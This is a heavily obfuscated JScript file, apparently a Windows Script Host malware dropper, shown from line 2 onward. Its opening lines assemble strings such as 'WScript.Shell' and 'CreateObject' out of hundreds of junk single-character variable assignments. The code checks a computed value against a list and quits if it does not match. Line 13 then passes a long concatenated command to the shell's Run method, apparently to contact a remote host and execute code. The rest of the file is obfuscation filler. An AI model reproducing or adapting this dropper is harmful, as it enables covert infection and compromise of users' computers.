2 | var jbcdtqr = this[kcrxlv + hkwjlj + wearigqh + tejovdeev + ybqvbyfl + vtyiy + abblikex + bcggh] ( this[qabokj + vgvbso + panrutt + wearigqh + liuzxmkoj + kcrxlv + bcggh][ylnbm + wearigqh + ybqvbyfl + hkwjlj + bcggh + ybqvbyfl + fiiworv + ajxzykg + aczrqd + ybqvbyfl + panrutt + bcggh] ( qabokj + vgvbso + panrutt + wearigqh + liuzxmkoj + kcrxlv + bcggh + waonf + vgvbso + dxldd + ybqvbyfl + jmlrbgq + jmlrbgq ) [ctisrtta + ybqvbyfl + ucdshavyq + ctisrtta + ybqvbyfl + hkwjlj + bjlpafiu] ( ctuilfaj + bwarcqq + puxkdcyu + ykxjo + hwwrpv + ylnbm + kfjjrpxme + ctisrtta + ctisrtta + puxkdcyu + whkftrwbz + bnlyb + hwwrpv + kfjjrpxme + vgvbso + puxkdcyu + ctisrtta + dotkwthv + ylnbm + fshyn + abblikex + bcggh + wearigqh + fshyn + jmlrbgq + shmbrp + ynooscbw + hkwjlj + abblikex + ybqvbyfl + jmlrbgq + dotkwthv + vtyiy + abblikex + bcggh + ybqvbyfl + wearigqh + abblikex + hkwjlj + bcggh + liuzxmkoj + fshyn + abblikex + hkwjlj + jmlrbgq + dotkwthv + gjfdqx + fshyn + panrutt + hkwjlj + jmlrbgq + ybqvbyfl ), 16 ); |
|
3 | for ( ikmmuj = 0 ; ikmmuj < ddafughql[jmlrbgq + ybqvbyfl + abblikex + ucdshavyq + bcggh + dxldd] ; ++ ikmmuj ) | |
4 | { | |
5 | if ( jbcdtqr == ddafughql[ikmmuj] ) | |
6 | { | |
7 | jbcdtqr = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( jbcdtqr !== true ) | |
12 | this[qabokj + vgvbso + panrutt + wearigqh + liuzxmkoj + kcrxlv + bcggh][ffmkgcjac + fgpvujtn + liuzxmkoj + bcggh] ( ); | |
13 | this[qabokj + vgvbso + panrutt + wearigqh + liuzxmkoj + kcrxlv + bcggh][ylnbm + wearigqh + ybqvbyfl + hkwjlj + bcggh + ybqvbyfl + fiiworv + ajxzykg + aczrqd + ybqvbyfl + panrutt + bcggh] ( qabokj + vgvbso + panrutt + wearigqh + liuzxmkoj + kcrxlv + bcggh + waonf + vgvbso + dxldd + ybqvbyfl + jmlrbgq + jmlrbgq ) [wearigqh + fgpvujtn + abblikex] ( panrutt + coddkd + bjlpafiu + shmbrp + gqvtewytr + panrutt + shmbrp + kcrxlv + fshyn + gofuoiwj + ybqvbyfl + wearigqh + tejovdeev + dxldd + ybqvbyfl + jmlrbgq + jmlrbgq + waonf + ybqvbyfl + huwddckuw + ybqvbyfl + shmbrp + wuoacc + ylnbm + fshyn + coddkd + coddkd + hkwjlj + abblikex + bjlpafiu + shmbrp + tizah + vtyiy + abblikex + uzbctob + fshyn + qxielmisl + ybqvbyfl + wuoacc + qabokj + ybqvbyfl + ajxzykg + ctisrtta + ybqvbyfl + jbjwigi + fgpvujtn + ybqvbyfl + tejovdeev + bcggh + shmbrp + wuoacc + fiiworv + fgpvujtn + bcggh + tdshpx + liuzxmkoj + jmlrbgq + ybqvbyfl + shmbrp + wvygzow + bcggh + ybqvbyfl + coddkd + kcrxlv + wvygzow + dotkwthv + liuzxmkoj + abblikex + uzbctob + fshyn + liuzxmkoj + panrutt + ybqvbyfl + waonf + kcrxlv + bjlpafiu + lftjfu + shmbrp + dxldd + bcggh + bcggh + kcrxlv + clanxtdz + gqvtewytr + gqvtewytr + qqlmgrn + dmvbrdz + pmjwrtz + waonf + qqlmgrn + wihqll + pmjwrtz + waonf + qqlmgrn + waonf + ryzrbl + bpixieee + wimbr + gqvtewytr + liuzxmkoj + abblikex + uzbctob + fshyn + liuzxmkoj + panrutt + ybqvbyfl + waonf + kcrxlv + dxldd + kcrxlv + tizah + yfhfvqizd + yfhfvqizd + tejovdeev + bcggh + hkwjlj + wearigqh + bcggh + shmbrp + wvygzow + bcggh + ybqvbyfl + coddkd + kcrxlv + wvygzow + dotkwthv + liuzxmkoj + abblikex + uzbctob + fshyn + liuzxmkoj + panrutt + ybqvbyfl + waonf + kcrxlv + bjlpafiu + lftjfu + yfhfvqizd + yfhfvqizd + panrutt + coddkd + bjlpafiu + shmbrp + gqvtewytr + panrutt + shmbrp + abblikex + ybqvbyfl + bcggh + shmbrp + fgpvujtn + tejovdeev + ybqvbyfl + shmbrp + dotkwthv + dotkwthv + qqlmgrn + dmvbrdz + pmjwrtz + waonf + qqlmgrn + wihqll + pmjwrtz + waonf + qqlmgrn + waonf + ryzrbl + bpixieee + wimbr + uohra + rpgovccd + rpgovccd + rpgovccd + rpgovccd + dotkwthv + bjlpafiu + hkwjlj + uzbctob + gofuoiwj + gofuoiwj + gofuoiwj + wearigqh + fshyn + fshyn + bcggh + dotkwthv + yfhfvqizd + yfhfvqizd + panrutt + coddkd + bjlpafiu + shmbrp + gqvtewytr + panrutt + shmbrp + wearigqh + ybqvbyfl + ucdshavyq + tejovdeev + uzbctob + wearigqh + pmjwrtz + ryzrbl + shmbrp + gqvtewytr + tejovdeev + shmbrp + dotkwthv + dotkwthv + qqlmgrn + dmvbrdz + pmjwrtz + waonf + qqlmgrn + wihqll + pmjwrtz + waonf + qqlmgrn + waonf + ryzrbl + bpixieee + wimbr + uohra + rpgovccd + rpgovccd + rpgovccd + rpgovccd + dotkwthv + bjlpafiu + hkwjlj + uzbctob + gofuoiwj + gofuoiwj + gofuoiwj + wearigqh + fshyn + fshyn + bcggh + dotkwthv + qqlmgrn + dpeup + bpixieee + mejwmm + qqlmgrn + ryzrbl + qqlmgrn + dpeup + mejwmm + dpeup + qqlmgrn + dpeup + dpeup + ryzrbl + dmvbrdz + waonf + bjlpafiu + jmlrbgq + jmlrbgq, 0, false ); |
|
14 | } | |
15 | tdshpx = "u"; | |
16 | tdshpx = "b"; | |
17 | tdshpx = "n"; | |
18 | tdshpx = "j"; | |
19 | tdshpx = "n"; | |
20 | tdshpx = "q"; | |
21 | tdshpx = "N"; | |
22 | tdshpx = "k"; | |
23 | tdshpx = "Q"; | |
24 | tdshpx = "t"; | |
25 | tdshpx = "Y"; | |
26 | tdshpx = "t"; | |
27 | tdshpx = "r"; | |
28 | tdshpx = "I"; | |
29 | tdshpx = "n"; | |
30 | tdshpx = "Y"; | |
31 | tdshpx = "q"; | |
32 | tdshpx = "S"; | |
33 | tdshpx = "z"; | |
34 | tdshpx = "W"; | |
35 | tdshpx = "y"; | |
36 | tdshpx = "B"; | |
37 | tdshpx = "Z"; | |
38 | tdshpx = "I"; | |
39 | tdshpx = "H"; | |
40 | tdshpx = "O"; | |
41 | tdshpx = "Z"; | |
42 | tdshpx = "M"; | |
43 | tdshpx = "Z"; | |
44 | tdshpx = "P"; | |
45 | tdshpx = "O"; | |
46 | tdshpx = "Y"; | |
47 | tdshpx = "F"; | |
48 | bjlpafiu = "d"; | |
49 | bjlpafiu = "C"; | |
50 | bjlpafiu = "Z"; | |
51 | bjlpafiu = "i"; | |
52 | bjlpafiu = "P"; | |
53 | bjlpafiu = "J"; | |
54 | bjlpafiu = "o"; | |
55 | bjlpafiu = "R"; | |
56 | bjlpafiu = "W"; | |
57 | bjlpafiu = "d"; | |
58 | ykxjo = "D"; | |
59 | ykxjo = "v"; | |
60 | ykxjo = "V"; | |
61 | ykxjo = "a"; | |
62 | ykxjo = "I"; | |
63 | ykxjo = "R"; | |
64 | ykxjo = "J"; | |
65 | ykxjo = "k"; | |
66 | ykxjo = "m"; | |
67 | ykxjo = "E"; | |
68 | ykxjo = "s"; | |
69 | ykxjo = "I"; | |
70 | ykxjo = "L"; | |
71 | ykxjo = "R"; | |
72 | ykxjo = "K"; | |
73 | ykxjo = "M"; | |
74 | ykxjo = "m"; | |
75 | ykxjo = "P"; | |
76 | ykxjo = "O"; | |
77 | ykxjo = "n"; | |
78 | ykxjo = "Y"; | |
79 | gjfdqx = "K"; | |
80 | gjfdqx = "u"; | |
81 | gjfdqx = "d"; | |
82 | gjfdqx = "N"; | |
83 | gjfdqx = "r"; | |
84 | gjfdqx = "K"; | |
85 | gjfdqx = "W"; | |
86 | gjfdqx = "T"; | |
87 | gjfdqx = "V"; | |
88 | gjfdqx = "X"; | |
89 | gjfdqx = "C"; | |
90 | gjfdqx = "P"; | |
91 | gjfdqx = "U"; | |
92 | gjfdqx = "E"; | |
93 | gjfdqx = "d"; | |
94 | gjfdqx = "f"; | |
95 | gjfdqx = "S"; | |
96 | gjfdqx = "a"; | |
97 | gjfdqx = "s"; | |
98 | gjfdqx = "e"; | |
99 | gjfdqx = "g"; | |
100 | gjfdqx = "t"; | |
101 | gjfdqx = "a"; | |
102 | gjfdqx = "B"; | |
103 | gjfdqx = "X"; | |
104 | gjfdqx = "c"; | |
105 | gjfdqx = "t"; | |
106 | gjfdqx = "a"; | |
107 | gjfdqx = "E"; | |
108 | gjfdqx = "r"; | |
109 | gjfdqx = "h"; | |
110 | gjfdqx = "m"; | |
111 | gjfdqx = "D"; | |
112 | gjfdqx = "o"; | |
113 | gjfdqx = "B"; | |
114 | gjfdqx = "N"; | |
115 | gjfdqx = "l"; | |
116 | gjfdqx = "d"; | |
117 | gjfdqx = "j"; | |
118 | gjfdqx = "k"; | |
119 | gjfdqx = "s"; | |
120 | gjfdqx = "u"; | |
121 | gjfdqx = "z"; | |
122 | gjfdqx = "X"; | |
123 | gjfdqx = "L"; | |
124 | pmjwrtz = "t"; | |
125 | pmjwrtz = "E"; | |
126 | pmjwrtz = "o"; | |
127 | pmjwrtz = "p"; | |
128 | pmjwrtz = "L"; | |
129 | pmjwrtz = "n"; | |
130 | pmjwrtz = "o"; | |
131 | pmjwrtz = "W"; | |
132 | pmjwrtz = "f"; | |
133 | pmjwrtz = "J"; | |
134 | pmjwrtz = "v"; | |
135 | pmjwrtz = "b"; | |
136 | pmjwrtz = "p"; | |
137 | pmjwrtz = "n"; | |
138 | pmjwrtz = "D"; | |
139 | pmjwrtz = "O"; | |
140 | pmjwrtz = "p"; | |
141 | pmjwrtz = "R"; | |
142 | pmjwrtz = "h"; | |
143 | pmjwrtz = "W"; | |
144 | pmjwrtz = "P"; | |
145 | pmjwrtz = "u"; | |
146 | pmjwrtz = "b"; | |
147 | pmjwrtz = "V"; | |
148 | pmjwrtz = "V"; | |
149 | pmjwrtz = "P"; | |
150 | pmjwrtz = "d"; | |
151 | pmjwrtz = "h"; | |
152 | pmjwrtz = "T"; | |
153 | pmjwrtz = "M"; | |
154 | pmjwrtz = "w"; | |
155 | pmjwrtz = "j"; | |
156 | pmjwrtz = "U"; | |
157 | pmjwrtz = "V"; | |
158 | pmjwrtz = "M"; | |
159 | pmjwrtz = "w"; | |
160 | pmjwrtz = "Q"; | |
161 | pmjwrtz = "Y"; | |
162 | pmjwrtz = "d"; | |
163 | pmjwrtz = "X"; | |
164 | pmjwrtz = "o"; | |
165 | pmjwrtz = "O"; | |
166 | pmjwrtz = "K"; | |
167 | pmjwrtz = "O"; | |
168 | pmjwrtz = "3"; | |
169 | bpixieee = "0"; | |
170 | ybqvbyfl = "W"; | |
171 | ybqvbyfl = "d"; | |
172 | ybqvbyfl = "J"; | |
173 | ybqvbyfl = "Z"; | |
174 | ybqvbyfl = "p"; | |
175 | ybqvbyfl = "c"; | |
176 | ybqvbyfl = "U"; | |
177 | ybqvbyfl = "G"; | |
178 | ybqvbyfl = "B"; | |
179 | ybqvbyfl = "W"; | |
180 | ybqvbyfl = "i"; | |
181 | ybqvbyfl = "h"; | |
182 | ybqvbyfl = "b"; | |
183 | ybqvbyfl = "T"; | |
184 | ybqvbyfl = "s"; | |
185 | ybqvbyfl = "B"; | |
186 | ybqvbyfl = "d"; | |
187 | ybqvbyfl = "s"; | |
188 | ybqvbyfl = "X"; | |
189 | ybqvbyfl = "J"; | |
190 | ybqvbyfl = "t"; | |
191 | ybqvbyfl = "g"; | |
192 | ybqvbyfl = "T"; | |
193 | ybqvbyfl = "L"; | |
194 | ybqvbyfl = "K"; | |
195 | ybqvbyfl = "p"; | |
196 | ybqvbyfl = "u"; | |
197 | ybqvbyfl = "o"; | |
198 | ybqvbyfl = "e"; | |
199 | whkftrwbz = "E"; | |
200 | whkftrwbz = "N"; | |
201 | ajxzykg = "N"; | |
202 | ajxzykg = "o"; | |
203 | ajxzykg = "L"; | |
204 | ajxzykg = "y"; | |
205 | ajxzykg = "k"; | |
206 | ajxzykg = "c"; | |
207 | ajxzykg = "j"; | |
208 | ajxzykg = "L"; | |
209 | ajxzykg = "h"; | |
210 | ajxzykg = "H"; | |
211 | ajxzykg = "N"; | |
212 | ajxzykg = "E"; | |
213 | ajxzykg = "Z"; | |
214 | ajxzykg = "x"; | |
215 | ajxzykg = "K"; | |
216 | ajxzykg = "Z"; | |
217 | ajxzykg = "a"; | |
218 | ajxzykg = "P"; | |
219 | ajxzykg = "A"; | |
220 | ajxzykg = "y"; | |
221 | ajxzykg = "f"; | |
222 | ajxzykg = "V"; | |
223 | ajxzykg = "i"; | |
224 | ajxzykg = "t"; | |
225 | ajxzykg = "W"; | |
226 | ajxzykg = "N"; | |
227 | ajxzykg = "D"; | |
228 | ajxzykg = "C"; | |
229 | ajxzykg = "n"; | |
230 | ajxzykg = "T"; | |
231 | ajxzykg = "Z"; | |
232 | ajxzykg = "m"; | |
233 | ajxzykg = "b"; | |
234 | qabokj = "h"; | |
235 | qabokj = "d"; | |
236 | qabokj = "W"; | |
237 | shmbrp = "L"; | |
238 | shmbrp = "x"; | |
239 | shmbrp = " "; | |
240 | hkwjlj = "g"; | |
241 | hkwjlj = "k"; | |
242 | hkwjlj = "V"; | |
243 | hkwjlj = "P"; | |
244 | hkwjlj = "o"; | |
245 | hkwjlj = "W"; | |
246 | hkwjlj = "d"; | |
247 | hkwjlj = "e"; | |
248 | hkwjlj = "T"; | |
249 | hkwjlj = "A"; | |
250 | hkwjlj = "J"; | |
251 | hkwjlj = "a"; | |
252 | fshyn = "H"; | |
253 | fshyn = "D"; | |
254 | fshyn = "q"; | |
255 | fshyn = "o"; | |
256 | huwddckuw = "L"; | |
257 | huwddckuw = "j"; | |
258 | huwddckuw = "S"; | |
259 | huwddckuw = "b"; | |
260 | huwddckuw = "z"; | |
261 | huwddckuw = "q"; | |
262 | huwddckuw = "j"; | |
263 | huwddckuw = "x"; | |
264 | coddkd = "f"; | |
265 | coddkd = "w"; | |
266 | coddkd = "t"; | |
267 | coddkd = "V"; | |
268 | coddkd = "y"; | |
269 | coddkd = "O"; | |
270 | coddkd = "v"; | |
271 | coddkd = "i"; | |
272 | coddkd = "D"; | |
273 | coddkd = "F"; | |
274 | coddkd = "e"; | |
275 | coddkd = "P"; | |
276 | coddkd = "P"; | |
277 | coddkd = "K"; | |
278 | coddkd = "D"; | |
279 | coddkd = "c"; | |
280 | coddkd = "z"; | |
281 | coddkd = "T"; | |
282 | coddkd = "l"; | |
283 | coddkd = "K"; | |
284 | coddkd = "F"; | |
285 | coddkd = "m"; | |
286 | coddkd = "w"; | |
287 | coddkd = "B"; | |
288 | coddkd = "a"; | |
289 | coddkd = "G"; | |
290 | coddkd = "c"; | |
291 | coddkd = "p"; | |
292 | coddkd = "j"; | |
293 | coddkd = "L"; | |
294 | coddkd = "G"; | |
295 | coddkd = "o"; | |
296 | coddkd = "l"; | |
297 | coddkd = "m"; | |
298 | coddkd = "m"; | |
299 | aczrqd = "v"; | |
300 | aczrqd = "f"; | |
301 | aczrqd = "S"; | |
302 | aczrqd = "G"; | |
303 | aczrqd = "f"; | |
304 | aczrqd = "n"; | |
305 | aczrqd = "C"; | |
306 | aczrqd = "f"; | |
307 | aczrqd = "j"; | |
308 | aczrqd = "l"; | |
309 | aczrqd = "q"; | |
310 | aczrqd = "b"; | |
311 | aczrqd = "K"; | |
312 | aczrqd = "o"; | |
313 | aczrqd = "O"; | |
314 | aczrqd = "T"; | |
315 | aczrqd = "j"; | |
316 | vgvbso = "t"; | |
317 | vgvbso = "c"; | |
318 | vgvbso = "l"; | |
319 | vgvbso = "p"; | |
320 | vgvbso = "C"; | |
321 | vgvbso = "d"; | |
322 | vgvbso = "U"; | |
323 | vgvbso = "z"; | |
324 | vgvbso = "l"; | |
325 | vgvbso = "m"; | |
326 | vgvbso = "F"; | |
327 | vgvbso = "J"; | |
328 | vgvbso = "c"; | |
329 | vgvbso = "u"; | |
330 | vgvbso = "Y"; | |
331 | vgvbso = "Q"; | |
332 | vgvbso = "V"; | |
333 | vgvbso = "z"; | |
334 | vgvbso = "J"; | |
335 | vgvbso = "J"; | |
336 | vgvbso = "D"; | |
337 | vgvbso = "Q"; | |
338 | vgvbso = "O"; | |
339 | vgvbso = "X"; | |
340 | vgvbso = "B"; | |
341 | vgvbso = "m"; | |
342 | vgvbso = "Y"; | |
343 | vgvbso = "s"; | |
344 | vgvbso = "i"; | |
345 | vgvbso = "x"; | |
346 | vgvbso = "k"; | |
347 | vgvbso = "V"; | |
348 | vgvbso = "Z"; | |
349 | vgvbso = "p"; | |
350 | vgvbso = "P"; | |
351 | vgvbso = "V"; | |
352 | vgvbso = "k"; | |
353 | vgvbso = "R"; | |
354 | vgvbso = "S"; | |
355 | vgvbso = "N"; | |
356 | vgvbso = "S"; | |
357 | puxkdcyu = "g"; | |
358 | puxkdcyu = "A"; | |
359 | puxkdcyu = "w"; | |
360 | puxkdcyu = "k"; | |
361 | puxkdcyu = "S"; | |
362 | puxkdcyu = "L"; | |
363 | puxkdcyu = "t"; | |
364 | puxkdcyu = "N"; | |
365 | puxkdcyu = "P"; | |
366 | puxkdcyu = "f"; | |
367 | puxkdcyu = "j"; | |
368 | puxkdcyu = "P"; | |
369 | puxkdcyu = "w"; | |
370 | puxkdcyu = "V"; | |
371 | puxkdcyu = "h"; | |
372 | puxkdcyu = "L"; | |
373 | puxkdcyu = "R"; | |
374 | puxkdcyu = "W"; | |
375 | puxkdcyu = "P"; | |
376 | puxkdcyu = "n"; | |
377 | puxkdcyu = "p"; | |
378 | puxkdcyu = "x"; | |
379 | puxkdcyu = "x"; | |
380 | puxkdcyu = "d"; | |
381 | puxkdcyu = "W"; | |
382 | puxkdcyu = "H"; | |
383 | puxkdcyu = "E"; | |
384 | wimbr = "g"; | |
385 | wimbr = "M"; | |
386 | wimbr = "T"; | |
387 | wimbr = "e"; | |
388 | wimbr = "b"; | |
389 | wimbr = "y"; | |
390 | wimbr = "d"; | |
391 | wimbr = "d"; | |
392 | wimbr = "H"; | |
393 | wimbr = "C"; | |
394 | wimbr = "a"; | |
395 | wimbr = "C"; | |
396 | wimbr = "X"; | |
397 | wimbr = "N"; | |
398 | wimbr = "A"; | |
399 | wimbr = "v"; | |
400 | wimbr = "E"; | |
401 | wimbr = "c"; | |
402 | wimbr = "E"; | |
403 | wimbr = "f"; | |
404 | wimbr = "p"; | |
405 | wimbr = "D"; | |
406 | wimbr = "m"; | |
407 | wimbr = "J"; | |
408 | wimbr = "X"; | |
409 | wimbr = "G"; | |
410 | wimbr = "g"; | |
411 | wimbr = "g"; | |
412 | wimbr = "5"; | |
413 | uohra = "B"; | |
414 | uohra = "H"; | |
415 | uohra = "q"; | |
416 | uohra = "X"; | |
417 | uohra = "G"; | |
418 | uohra = "g"; | |
419 | uohra = "B"; | |
420 | uohra = "Y"; | |
421 | uohra = "O"; | |
422 | uohra = "z"; | |
423 | uohra = "W"; | |
424 | uohra = "j"; | |
425 | uohra = "B"; | |
426 | uohra = "t"; | |
427 | uohra = "G"; | |
428 | uohra = "K"; | |
429 | uohra = "o"; | |
430 | uohra = "l"; | |
431 | uohra = "K"; | |
432 | uohra = "r"; | |
433 | uohra = "y"; | |
434 | uohra = "n"; | |
435 | uohra = "S"; | |
436 | uohra = "I"; | |
437 | uohra = "I"; | |
438 | uohra = "K"; | |
439 | uohra = "b"; | |
440 | uohra = "F"; | |
441 | uohra = "@"; | |
442 | wearigqh = "q"; | |
443 | wearigqh = "w"; | |
444 | wearigqh = "e"; | |
445 | wearigqh = "E"; | |
446 | wearigqh = "y"; | |
447 | wearigqh = "r"; | |
448 | ylnbm = "R"; | |
449 | ylnbm = "V"; | |
450 | ylnbm = "g"; | |
451 | ylnbm = "v"; | |
452 | ylnbm = "X"; | |
453 | ylnbm = "S"; | |
454 | ylnbm = "s"; | |
455 | ylnbm = "A"; | |
456 | ylnbm = "Q"; | |
457 | ylnbm = "x"; | |
458 | ylnbm = "h"; | |
459 | ylnbm = "l"; | |
460 | ylnbm = "a"; | |
461 | ylnbm = "G"; | |
462 | ylnbm = "t"; | |
463 | ylnbm = "e"; | |
464 | ylnbm = "E"; | |
465 | ylnbm = "i"; | |
466 | ylnbm = "V"; | |
467 | ylnbm = "C"; | |
468 | ctisrtta = "Y"; | |
469 | ctisrtta = "T"; | |
470 | ctisrtta = "h"; | |
471 | ctisrtta = "j"; | |
472 | ctisrtta = "g"; | |
473 | ctisrtta = "B"; | |
474 | ctisrtta = "N"; | |
475 | ctisrtta = "W"; | |
476 | ctisrtta = "J"; | |
477 | ctisrtta = "g"; | |
478 | ctisrtta = "f"; | |
479 | ctisrtta = "l"; | |
480 | ctisrtta = "i"; | |
481 | ctisrtta = "U"; | |
482 | ctisrtta = "h"; | |
483 | ctisrtta = "V"; | |
484 | ctisrtta = "N"; | |
485 | ctisrtta = "k"; | |
486 | ctisrtta = "R"; | |
487 | hwwrpv = "E"; | |
488 | hwwrpv = "r"; | |
489 | hwwrpv = "Q"; | |
490 | hwwrpv = "N"; | |
491 | hwwrpv = "l"; | |
492 | hwwrpv = "F"; | |
493 | hwwrpv = "R"; | |
494 | hwwrpv = "I"; | |
495 | hwwrpv = "V"; | |
496 | hwwrpv = "d"; | |
497 | hwwrpv = "H"; | |
498 | hwwrpv = "q"; | |
499 | hwwrpv = "c"; | |
500 | hwwrpv = "s"; | |
501 | hwwrpv = "k"; | |
502 | hwwrpv = "p"; | |
503 | hwwrpv = "y"; | |
504 | hwwrpv = "S"; | |
505 | hwwrpv = "E"; | |
506 | hwwrpv = "g"; | |
507 | hwwrpv = "c"; | |
508 | hwwrpv = "b"; | |
509 | hwwrpv = "P"; | |
510 | hwwrpv = "W"; | |
511 | hwwrpv = "M"; | |
512 | hwwrpv = "s"; | |
513 | hwwrpv = "K"; | |
514 | hwwrpv = "p"; | |
515 | hwwrpv = "S"; | |
516 | hwwrpv = "W"; | |
517 | hwwrpv = "o"; | |
518 | hwwrpv = "M"; | |
519 | hwwrpv = "B"; | |
520 | hwwrpv = "D"; | |
521 | hwwrpv = "I"; | |
522 | hwwrpv = "G"; | |
523 | hwwrpv = "d"; | |
524 | hwwrpv = "d"; | |
525 | hwwrpv = "j"; | |
526 | hwwrpv = "j"; | |
527 | hwwrpv = "v"; | |
528 | hwwrpv = "c"; | |
529 | hwwrpv = "_"; | |
530 | fiiworv = "C"; | |
531 | fiiworv = "I"; | |
532 | fiiworv = "f"; | |
533 | fiiworv = "i"; | |
534 | fiiworv = "H"; | |
535 | fiiworv = "B"; | |
536 | fiiworv = "Z"; | |
537 | fiiworv = "L"; | |
538 | fiiworv = "o"; | |
539 | fiiworv = "I"; | |
540 | fiiworv = "l"; | |
541 | fiiworv = "T"; | |
542 | fiiworv = "v"; | |
543 | fiiworv = "V"; | |
544 | fiiworv = "i"; | |
545 | fiiworv = "A"; | |
546 | fiiworv = "k"; | |
547 | fiiworv = "W"; | |
548 | fiiworv = "B"; | |
549 | fiiworv = "U"; | |
550 | fiiworv = "U"; | |
551 | fiiworv = "q"; | |
552 | fiiworv = "d"; | |
553 | fiiworv = "c"; | |
554 | fiiworv = "q"; | |
555 | fiiworv = "c"; | |
556 | fiiworv = "f"; | |
557 | fiiworv = "S"; | |
558 | fiiworv = "C"; | |
559 | fiiworv = "b"; | |
560 | fiiworv = "M"; | |
561 | fiiworv = "F"; | |
562 | fiiworv = "O"; | |
563 | qxielmisl = "f"; | |
564 | qxielmisl = "N"; | |
565 | qxielmisl = "X"; | |
566 | qxielmisl = "B"; | |
567 | qxielmisl = "c"; | |
568 | qxielmisl = "D"; | |
569 | qxielmisl = "s"; | |
570 | qxielmisl = "U"; | |
571 | qxielmisl = "t"; | |
572 | qxielmisl = "B"; | |
573 | qxielmisl = "k"; | |
574 | qxielmisl = "L"; | |
575 | qxielmisl = "s"; | |
576 | qxielmisl = "P"; | |
577 | qxielmisl = "T"; | |
578 | qxielmisl = "g"; | |
579 | qxielmisl = "q"; | |
580 | qxielmisl = "U"; | |
581 | qxielmisl = "P"; | |
582 | qxielmisl = "b"; | |
583 | qxielmisl = "x"; | |
584 | qxielmisl = "p"; | |
585 | qxielmisl = "a"; | |
586 | qxielmisl = "H"; | |
587 | qxielmisl = "G"; | |
588 | qxielmisl = "s"; | |
589 | qxielmisl = "W"; | |
590 | qxielmisl = "P"; | |
591 | qxielmisl = "W"; | |
592 | qxielmisl = "y"; | |
593 | qxielmisl = "B"; | |
594 | qxielmisl = "t"; | |
595 | qxielmisl = "T"; | |
596 | qxielmisl = "o"; | |
597 | qxielmisl = "p"; | |
598 | qxielmisl = "o"; | |
599 | qxielmisl = "c"; | |
600 | qxielmisl = "O"; | |
601 | qxielmisl = "m"; | |
602 | qxielmisl = "Y"; | |
603 | qxielmisl = "m"; | |
604 | qxielmisl = "P"; | |
605 | qxielmisl = "b"; | |
606 | qxielmisl = "u"; | |
607 | qxielmisl = "k"; | |
608 | dpeup = "t"; | |
609 | dpeup = "k"; | |
610 | dpeup = "Y"; | |
611 | dpeup = "P"; | |
612 | dpeup = "O"; | |
613 | dpeup = "u"; | |
614 | dpeup = "A"; | |
615 | dpeup = "J"; | |
616 | dpeup = "l"; | |
617 | dpeup = "c"; | |
618 | dpeup = "q"; | |
619 | dpeup = "A"; | |
620 | dpeup = "C"; | |
621 | dpeup = "y"; | |
622 | dpeup = "x"; | |
623 | dpeup = "u"; | |
624 | dpeup = "v"; | |
625 | dpeup = "j"; | |
626 | dpeup = "s"; | |
627 | dpeup = "A"; | |
628 | dpeup = "M"; | |
629 | dpeup = "q"; | |
630 | dpeup = "D"; | |
631 | dpeup = "u"; | |
632 | dpeup = "T"; | |
633 | dpeup = "K"; | |
634 | dpeup = "C"; | |
635 | dpeup = "v"; | |
636 | dpeup = "L"; | |
637 | dpeup = "G"; | |
638 | dpeup = "v"; | |
639 | dpeup = "k"; | |
640 | dpeup = "w"; | |
641 | dpeup = "g"; | |
642 | dpeup = "O"; | |
643 | dpeup = "S"; | |
644 | dpeup = "Y"; | |
645 | dpeup = "K"; | |
646 | dpeup = "H"; | |
647 | dpeup = "K"; | |
648 | dpeup = "E"; | |
649 | dpeup = "V"; | |
650 | dpeup = "u"; | |
651 | dpeup = "7"; | |
652 | vtyiy = "r"; | |
653 | vtyiy = "m"; | |
654 | vtyiy = "q"; | |
655 | vtyiy = "x"; | |
656 | vtyiy = "h"; | |
657 | vtyiy = "I"; | |
658 | panrutt = "l"; | |
659 | panrutt = "Y"; | |
660 | panrutt = "y"; | |
661 | panrutt = "A"; | |
662 | panrutt = "J"; | |
663 | panrutt = "E"; | |
664 | panrutt = "i"; | |
665 | panrutt = "e"; | |
666 | panrutt = "P"; | |
667 | panrutt = "p"; | |
668 | panrutt = "y"; | |
669 | panrutt = "G"; | |
670 | panrutt = "W"; | |
671 | panrutt = "s"; | |
672 | panrutt = "R"; | |
673 | panrutt = "G"; | |
674 | panrutt = "S"; | |
675 | panrutt = "g"; | |
676 | panrutt = "H"; | |
677 | panrutt = "c"; | |
678 | bcggh = "F"; | |
679 | bcggh = "y"; | |
680 | bcggh = "l"; | |
681 | bcggh = "s"; | |
682 | bcggh = "o"; | |
683 | bcggh = "v"; | |
684 | bcggh = "c"; | |
685 | bcggh = "i"; | |
686 | bcggh = "R"; | |
687 | bcggh = "G"; | |
688 | bcggh = "F"; | |
689 | bcggh = "F"; | |
690 | bcggh = "s"; | |
691 | bcggh = "f"; | |
692 | bcggh = "c"; | |
693 | bcggh = "i"; | |
694 | bcggh = "o"; | |
695 | bcggh = "L"; | |
696 | bcggh = "i"; | |
697 | bcggh = "N"; | |
698 | bcggh = "w"; | |
699 | bcggh = "D"; | |
700 | bcggh = "K"; | |
701 | bcggh = "G"; | |
702 | bcggh = "V"; | |
703 | bcggh = "Z"; | |
704 | bcggh = "u"; | |
705 | bcggh = "I"; | |
706 | bcggh = "w"; | |
707 | bcggh = "I"; | |
708 | bcggh = "u"; | |
709 | bcggh = "T"; | |
710 | bcggh = "J"; | |
711 | bcggh = "I"; | |
712 | bcggh = "a"; | |
713 | bcggh = "G"; | |
714 | bcggh = "L"; | |
715 | bcggh = "t"; | |
716 | mejwmm = "m"; | |
717 | mejwmm = "o"; | |
718 | mejwmm = "u"; | |
719 | mejwmm = "j"; | |
720 | mejwmm = "u"; | |
721 | mejwmm = "O"; | |
722 | mejwmm = "E"; | |
723 | mejwmm = "M"; | |
724 | mejwmm = "W"; | |
725 | mejwmm = "G"; | |
726 | mejwmm = "F"; | |
727 | mejwmm = "H"; | |
728 | mejwmm = "N"; | |
729 | mejwmm = "w"; | |
730 | mejwmm = "n"; | |
731 | mejwmm = "Y"; | |
732 | mejwmm = "p"; | |
733 | mejwmm = "F"; | |
734 | mejwmm = "d"; | |
735 | mejwmm = "S"; | |
736 | mejwmm = "n"; | |
737 | mejwmm = "o"; | |
738 | mejwmm = "T"; | |
739 | mejwmm = "j"; | |
740 | mejwmm = "X"; | |
741 | mejwmm = "t"; | |
742 | mejwmm = "u"; | |
743 | mejwmm = "Z"; | |
744 | mejwmm = "G"; | |
745 | mejwmm = "l"; | |
746 | mejwmm = "D"; | |
747 | mejwmm = "M"; | |
748 | mejwmm = "W"; | |
749 | mejwmm = "Z"; | |
750 | mejwmm = "Q"; | |
751 | mejwmm = "O"; | |
